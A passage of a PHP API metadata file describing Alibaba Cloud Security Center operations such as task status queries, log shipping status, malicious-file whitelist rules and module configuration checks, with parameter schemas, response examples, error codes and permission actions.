403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53C0DC1F8\\",\\n \\"RuleTarget\\": {\\n \\"AppName\\": \\"netperf-client\\",\\n \\"ImageList\\": [\\n \\"nginx:latest\\"\\n ],\\n \\"TagList\\": [\\n \\"service:be-v1\\"\\n ],\\n \\"TargetId\\": 400723,\\n \\"TargetName\\": \\"destination-test-obj-Na3cF\\",\\n \\"Namespace\\": \\"secondary\\",\\n \\"TargetType\\": \\"IMAGE\\",\\n \\"ClusterName\\": \\"sas-test-cnnf\\\\n\\",\\n \\"ClusterId\\": \\"ca6e6594def8d4be8b2795fd12c32****\\"\\n }\\n}","type":"json"}]', 'title' => 'GetInterceptionTargetDetail', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetInterceptionTargetDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetInterceptionTargetDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetLastOnceTaskInfo' => [ 'summary' => 'Retrieves runtime information for the latest scan task to check its completion status.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'TaskType', 'in' => 'query', 'schema' => ['description' => 'The type of the task. Valid values:'."\n" ."\n" .'- `CLIENT_PROBLEM_CHECK`: client troubleshooting task'."\n" ."\n" .'- `CLIENT_DEV_OPS`: O\\&M task'."\n" ."\n" .'- `ASSET_SECURITY_CHECK`: asset collection task'."\n" ."\n" .'- `ASSETS_COLLECTION`: asset fingerprint collection task'."\n" ."\n" .'- `IMAGE_SCAN`: container image scan task'."\n" ."\n" .'- `AI_SECURITY_CHECK`: AI asset synchronization task'."\n" ."\n" .'- `IDC_PROBE_SCAN`: IDC probe scan task'."\n" ."\n" .'- `ATTACK_SURFACE_SCAN`: attack surface boundary asset scan task'."\n" ."\n" .'- `ASSET_EXPOSURE_SCAN`: asset exposure scan task'."\n" ."\n" .'- `VUL_CHECK_TASK`: vulnerability scan task', 'type' => 'string', 'required' => true, 'example' => 'ASSETS_COLLECTION', 'title' => ''], ], [ 'name' => 'TaskName', 'in' => 'query', 'schema' => ['description' => 'The name of the task. Valid values:'."\n" ."\n" .'- `CLIENT_PROBLEM_CHECK`: client troubleshooting task'."\n" ."\n" .'- `CLIENT_DEV_OPS`: O\\&M task'."\n" ."\n" .'- `ASSET_SECURITY_CHECK`: asset collection task'."\n" ."\n" .'- `ASSETS_COLLECTION`: asset fingerprint collection task'."\n" ."\n" .'- `IMAGE_SCAN`: container image scan task'."\n" ."\n" .'- `AI_SECURITY_CHECK`: AI asset synchronization task'."\n" ."\n" .'- `IDC_PROBE_SCAN`: IDC probe scan task'."\n" ."\n" .'- `ATTACK_SURFACE_SCAN`: attack surface boundary asset scan task'."\n" ."\n" .'- `ASSET_EXPOSURE_SCAN`: asset exposure scan task'."\n" ."\n" .'- `VUL_CHECK_TASK`: vulnerability scan task', 'type' => 'string', 'required' => true, 'example' => 'ASSETS_COLLECTION', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The source that initiated the task.', 'type' => 'string', 'required' => false, 'example' => 'console_batch', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'CollectTime' => ['description' => 'The timestamp indicating when the task\'s data was collected.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671184531000', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. This ID is generated by Alibaba Cloud and is used to troubleshoot issues.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578AB****', 'title' => ''], 'TotalCount' => ['description' => 'The total number of items in the task.', 'type' => 'integer', 'format' => 'int32', 'example' => '44', 'title' => ''], 'TaskId' => ['description' => 'The ID of the scan task.', 'type' => 'integer', 'format' => 'int64', 'example' => '3f65e1f1bb13118891a889d569a3****', 'title' => ''], 'FinishCount' => ['description' => 'The number of completed items.', 'type' => 'integer', 'format' => 'int32', 'example' => '67', 'title' => ''], 'TaskInfo' => [ 'description' => 'Details about the task.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the task. Valid values:'."\n" ."\n" .'- `INIT`: Pending'."\n" ."\n" .'- `START`: Started'."\n" ."\n" .'- `SUCCESS`: Complete'."\n" ."\n" .'- `TIMEOUT`: Timed Out', 'type' => 'string', 'example' => 'SUCCESS', 'title' => ''], 'Progress' => ['description' => 'The task progress as a percentage.', 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Result' => ['description' => 'The result of the scan task. Valid values:'."\n" ."\n" .'- `SUCCESS`: The scan task was successfully executed.'."\n" ."\n" .'- `TASK_NOT_SUPPORT_REGION`: The container image is in a region where scanning is not supported.'."\n" ."\n" .'- `TASK_NOT_EXISTS`: The task does not exist.', 'type' => 'string', 'example' => 'SUCCESS', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CollectTime\\": 1671184531000,\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578AB****\\",\\n \\"TotalCount\\": 44,\\n \\"TaskId\\": 0,\\n \\"FinishCount\\": 67,\\n \\"TaskInfo\\": {\\n \\"Status\\": \\"SUCCESS\\",\\n \\"Progress\\": 69,\\n \\"Result\\": \\"SUCCESS\\"\\n }\\n}","type":"json"}]', 'title' => 'GetLastOnceTaskInfo', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetLastOnceTaskInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-aegis:GetLastOnceTaskInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetLocalDefaultRegion' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '153432', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Vendor', 'in' => 'query', 'allowEmptyValue' => false, 'schema' => ['description' => 'The cloud asset vendor. Valid values:'."\n" ."\n" .'- **Tencent**: Tencent Cloud'."\n" .'- **HUAWEICLOUD**: Huawei Cloud'."\n" .'- **Azure**: Azure'."\n" .'- **AWS**: AWS.', 'type' => 'string', 'required' => false, 'example' => 'Tencent', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique identifier that Alibaba Cloud generates for the request.', 'type' => 'string', 'example' => 'F6D23860-55C2-55AA-B484-****', 'title' => ''], 'Status' => ['description' => 'The access type of the multi-cloud site. Valid values:'."\n" .'- **0**: No default site exists. You can select one.'."\n" .'- **1**: The current site is already the default site.'."\n" .'- **2**: Another site is already set as the default site.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve default local region', 'summary' => 'Retrieves the default synchronization region for external asset synchronization.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetLocalDefaultRegion'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetLocalDefaultRegion', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F6D23860-55C2-55AA-B484-****\\",\\n \\"Status\\": 1\\n}","type":"json"}]', ], 'GetLogMeta' => [ 'summary' => 'Queries the status of a data shipping task of a log.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '193888', 'abilityTreeNodes' => ['FEATUREsasA2G5MU'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'LogStore', 'in' => 'query', 'schema' => ['description' => 'The name of the dedicated Logstore in which logs are stored.'."\n" ."\n" .'> You can call the [DescribeLogMeta](~~DescribeLogMeta~~) operation to query the name of the Logstore.'."\n", 'type' => 'string', 'required' => true, 'example' => 'aegis-log-login'."\n", 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain the IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '3956048F-9D73-5EDB-834B-4827BB48****', 'title' => ''], 'LogMeta' => [ 'description' => 'The data of a data shipping task.'."\n", 'type' => 'object', 'properties' => [ 'Project' => ['description' => 'The Simple Log Service project.'."\n", 'type' => 'string', 'example' => 'sas-log', 'title' => ''], 'LogStore' => ['description' => 'The name of the dedicated Logstore in which logs are stored.'."\n", 'type' => 'string', 'example' => 'aegis-log-login', 'title' => ''], 'Status' => ['description' => 'The status of a data shipping task of a log. Valid values:'."\n" ."\n" .'* **enabled**'."\n" .'* **disabled**'."\n", 'type' => 'string', 'example' => 'enabled', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB48****\\",\\n \\"LogMeta\\": {\\n \\"Project\\": \\"sas-log\\",\\n \\"LogStore\\": \\"aegis-log-login\\",\\n \\"Status\\": \\"enabled\\"\\n }\\n}","type":"json"}]', 'title' => 'GetLogMeta', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetLogMeta'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetLogMeta', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'LogMeta', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:logmeta/{#LogMetaName}'], ], ], ], ], ], 'GetMaliciousFileWhitelistConfig' => [ 'summary' => 'Queries an alert whitelist rule of sensitive files that are detected by using the agentless detection feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '184426', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'ConfigId', 'in' => 'query', 'schema' => ['description' => 'The ID of the whitelist rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'GmtCreate' => ['title' => '', 'description' => 'The creation time.'."\n", 'type' => 'string', 'example' => '1671607025000'], 'GmtModified' => ['title' => '', 'description' => 'The modification time.'."\n", 'type' => 'string', 'example' => '1674095396000'], 'EventName' => ['title' => '', 'description' => 'The name of the alert.'."\n" ."\n" .'* The value is fixed as ALL, which indicates all alert types.'."\n", 'type' => 'string', 'example' => 'ALL'], 'Field' => ['title' => '', 'description' => 'The field that is used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'fileMd5'], 'FieldValue' => ['title' => '', 'description' => 'The value of the field that is used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'b2cf9747ee49d8d9b105cf16e078cc16'], 'Operator' => ['title' => '', 'description' => 'The logical operator that is used in the whitelist rule.'."\n" ."\n" .'* The value is fixed as strEqual, which indicates the equality operator (=).'."\n", 'type' => 'string', 'example' => 'strEqual'], 'TargetValue' => ['title' => '', 'description' => 'The assets on which the whitelist rule takes effect. Valid values:'."\n" ."\n" .'* ALL: all assets'."\n" .'* Others: selected assets'."\n", 'type' => 'string', 'example' => 'ALL'], 'TargetType' => ['title' => '', 'description' => 'The type of the assets on which the whitelist rule takes effect. Valid values:'."\n" ."\n" .'* ALL: all assets'."\n" .'* SELECTION_KEY: selected assets'."\n", 'type' => 'string', 'example' => 'ALL'], 'Count' => ['title' => '', 'description' => 'The number of assets on which the whitelist rule takes effect.'."\n" ."\n" .'> The value of this parameter is returned only if the value of TargetType is SELECTION_KEY.'."\n", 'type' => 'string', 'example' => '0'], 'Source' => ['title' => '', 'description' => 'The feature to which this operation belongs.'."\n" ."\n" .'* The value is fixed as agentless, which indicates the agentless detection feature.'."\n", 'type' => 'string', 'example' => 'agentless'], 'Id' => ['description' => 'The ID of the whitelist rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code. The value 200 indicates that the request was successful.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"GmtCreate\\": \\"1671607025000\\",\\n \\"GmtModified\\": \\"1674095396000\\",\\n \\"EventName\\": \\"ALL\\",\\n \\"Field\\": \\"fileMd5\\",\\n \\"FieldValue\\": \\"b2cf9747ee49d8d9b105cf16e078cc16\\",\\n \\"Operator\\": \\"strEqual\\",\\n \\"TargetValue\\": \\"ALL\\",\\n \\"TargetType\\": \\"ALL\\",\\n \\"Count\\": \\"0\\",\\n \\"Source\\": \\"agentless\\",\\n \\"Id\\": 1\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'GetMaliciousFileWhitelistConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetMaliciousFileWhitelistConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetMaliciousFileWhitelistConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'MaliciousFileWhitelistConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:maliciousfilewhitelistconfig/{#ConfigId}'], ], ], ], ], ], 'GetModuleConfig' => [ 'summary' => 'Queries the configurations of a module.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.'."\n", 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: **10**.'."\n", 'type' => 'string', 'required' => false, 'example' => '10', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'HttpStatusCode' => ['description' => 'The response code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '291B49F9-1685-4005-9D34-606B6F78****', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'ModuleConfigList' => [ 'description' => 'An array that consists of the configurations of the module.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The object of the module.'."\n", 'type' => 'object', 'properties' => [ 'ModuleName' => ['description' => 'The name of the module.'."\n", 'type' => 'string', 'example' => 'alihids', 'title' => ''], 'ConfigName' => ['description' => 'The name of the configuration.'."\n", 'type' => 'string', 'example' => 'timescan', 'title' => ''], 'Items' => [ 'description' => 'An array that consists of the configuration items.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The objection information returned.'."\n", 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => 'a47e3713-ed22-4015-93a3-d88ebe6****', 'title' => ''], 'GroupId' => ['description' => 'The ID of the server group to which the server belongs.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5562414', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the server.'."\n", 'type' => 'string', 'example' => 'inStanceName****', 'title' => ''], 'Region' => ['description' => 'The region in which the server resides.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Ip' => ['description' => 'The IP address of the server.'."\n", 'type' => 'string', 'example' => '2.2.X.X', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.'."\n", 'type' => 'string', 'example' => 'i-uf6435dn4t59b9av****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"HttpStatusCode\\": 200,\\n \\"RequestId\\": \\"291B49F9-1685-4005-9D34-606B6F78****\\",\\n \\"Success\\": true,\\n \\"ModuleConfigList\\": [\\n {\\n \\"ModuleName\\": \\"alihids\\",\\n \\"ConfigName\\": \\"timescan\\",\\n \\"Items\\": [\\n {\\n \\"Uuid\\": \\"a47e3713-ed22-4015-93a3-d88ebe6****\\",\\n \\"GroupId\\": 5562414,\\n \\"InstanceName\\": \\"inStanceName****\\",\\n \\"Region\\": \\"cn-hangzhou\\",\\n \\"Ip\\": \\"2.2.X.X\\",\\n \\"InstanceId\\": \\"i-uf6435dn4t59b9av****\\"\\n }\\n ]\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"Count\\": 100\\n }\\n}","type":"json"}]', 'title' => 'GetModuleConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetModuleConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetModuleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetModuleConfigStatus' => [ 'summary' => 'Checks whether the purchased Security Center features are enabled and whether related configurations take effect.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas312EAH'], ], 'parameters' => [ [ 'name' => 'ModuleNames', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The service modules that you want to query.'."\n", 'type' => 'array', 'items' => ['description' => 'The name of the check item that you want to query. Valid values:'."\n" ."\n" .'* **Ransom**: The anti-ransomware policy is enabled.'."\n" .'* **WebLock**: The web tamper proofing feature is enabled.'."\n" .'* **Rasp**: Applications are added to the application protection feature.'."\n" .'* **Image**: The container images that can be scanned are specified.'."\n" .'* **Virus**: The periodic virus scan policy is enabled.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Rasp', 'title' => ''], 'required' => true, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'ModuleConfigResults' => [ 'description' => 'The check results of the service modules.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The check results of the service module.'."\n", 'type' => 'object', 'properties' => [ 'Pass' => [ 'description' => 'Indicates whether the service module passed the status check. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'enumValueTitles' => [], 'example' => 'true', 'title' => '', ], 'ModuleName' => ['description' => 'The name of the check item. Valid values:'."\n" ."\n" .'* **Ransom**: The anti-ransomware policy is enabled.'."\n" .'* **WebLock**: The web tamper proofing feature is enabled.'."\n" .'* **Rasp**: Applications are added to the application protection feature.'."\n" .'* **Image**: The container images that can be scanned are specified.'."\n" .'* **Virus**: The periodic virus scan policy is enabled.'."\n", 'type' => 'string', 'example' => 'Ransom', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '843E4805-****-7EE12FA8DBFD', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"ModuleConfigResults\\": [\\n {\\n \\"Pass\\": true,\\n \\"ModuleName\\": \\"Ransom\\"\\n }\\n ]\\n },\\n \\"RequestId\\": \\"843E4805-****-7EE12FA8DBFD\\"\\n}","type":"json"}]', 'title' => 'GetModuleConfigStatus', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetModuleConfigStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetModuleConfigStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetModuleTrialAuthInfo' => [ 'summary' => 'Queries the qualification information about the trial use of Security Center value-added features, including vulnerability fixing and threat analysis and response.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '196547', 'abilityTreeNodes' => ['FEATUREsas8YMQ5V'], ], 'parameters' => [ [ 'name' => 'ModuleCode', 'in' => 'query', 'schema' => ['description' => 'The code of the feature. Valid values:'."\n" ."\n" .'* **vulFix**: vulnerability fixing.'."\n" .'* **cloudSiem**: threat analysis and response.'."\n", 'type' => 'string', 'required' => false, 'example' => 'vulFix', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.'."\n", 'type' => 'object', 'properties' => [ 'ModuleCode' => ['description' => 'The code of the feature. Valid values:'."\n" ."\n" .'* **vulFix**: vulnerability fixing.'."\n" .'* **cloudSiem**: threat analysis and response.'."\n", 'type' => 'string', 'example' => 'vulFix', 'title' => ''], 'CanTry' => ['description' => 'Indicates whether the user is qualified for the trial use. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'TrialRecordList' => [ 'description' => 'The trial use record.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The trial use record.'."\n", 'type' => 'object', 'properties' => [ 'ModuleCode' => ['description' => 'The code of the feature. Valid values:'."\n" ."\n" .'* **vulFix**: vulnerability fixing.'."\n" .'* **cloudSiem**: threat analysis and response.'."\n", 'type' => 'string', 'example' => 'vulFix', 'title' => ''], 'AuthLimit' => ['description' => 'The quota.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '100', 'title' => ''], 'GmtStart' => ['description' => 'The start time of the trial use.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1669824000000', 'title' => ''], 'GmtEnd' => ['description' => 'The end time of the trial use.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1679760000000', 'title' => ''], 'Status' => ['description' => 'The status of the trial use. Valid values:'."\n" ."\n" .'* **1**: The feature is in trial use.'."\n" .'* **0**: The trial use ends.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AuthLimitList' => ['description' => 'The list of quotas. This parameter is available if the value of the ModuleCode parameter is cloudSiem. The value of this parameter consists of the log storage capacity for the threat analysis and response feature and the log data to add. Units: GB and GB-day.'."\n", 'type' 